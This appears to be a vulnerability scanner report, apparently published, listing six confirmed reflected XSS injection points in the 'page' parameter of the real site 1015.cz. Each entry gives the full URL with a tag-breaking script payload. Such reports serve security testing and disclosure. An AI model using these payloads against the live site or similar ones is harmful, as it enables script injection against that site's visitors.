1015.cz

1. XSS (Cross-site Scripting)
2.  
3. Severity: Important
4. Confirmation: Confirmed
5. Vulnerable URL : http://www.1015.cz/index.php?l=en&page='"--></style></script><script>alert(0x000089)</script>&page_sub=3
6. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
7. Parameter Name: page
8. Parameter Type: Querystring
9. Attack Pattern: '"--></style></script><script>alert(0x000089)</script>
10.  
11. Severity: Important
12. Confirmation: Confirmed
13. Vulnerable URL : http://www.1015.cz/index.php?l=cz&page='"--></style></script><script>alert(0x0000B5)</script>&page_sub=1&y=2012&id=346
14. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
15. Parameter Name: page
16. Parameter Type: Querystring
17. Attack Pattern: '"--></style></script><script>alert(0x0000B5)</script>
18.  
19. Severity: Important
20. Confirmation: Confirmed
21. Vulnerable URL : http://www.1015.cz/index.php?l=cz&od=0&page='"--></style></script><script>alert(0x0000B8)</script>&page_sub=3&n_id=334
22. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
23. Parameter Name: page
24. Parameter Type: Querystring
25. Attack Pattern: '"--></style></script><script>alert(0x0000B8)</script>
26.  
27. Severity: Important
28. Confirmation: Confirmed
29. Vulnerable URL : http://www.1015.cz/index.php?l=cz&page='"--></style></script><script>alert(0x0000F4)</script>&page_sub=5&id=245
30. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
31. Parameter Name: page
32. Parameter Type: Querystring
33. Attack Pattern: '"--></style></script><script>alert(0x0000F4)</script>
34.  
35.  
36. Severity: Important
37. Confirmation: Confirmed
38. Vulnerable URL : http://www.1015.cz/?l=cz&page='"--></style></script><script>alert(0x000190)</script>
39. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
40. Parameter Name: page
41. Parameter Type: Querystring
42. Attack Pattern: '"--></style></script><script>alert(0x000190)</script>
43.  
44. Severity: Important
45. Confirmation: Confirmed
46. Vulnerable URL : http://www.1015.cz/?l=cz&page='"--></style></script><script>alert(0x0001E0)</script>&page_sub=16
47. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
48. Parameter Name: page
49. Parameter Type: Querystring
50. Attack Pattern: '"--></style></script><script>alert(0x0001E0)</script>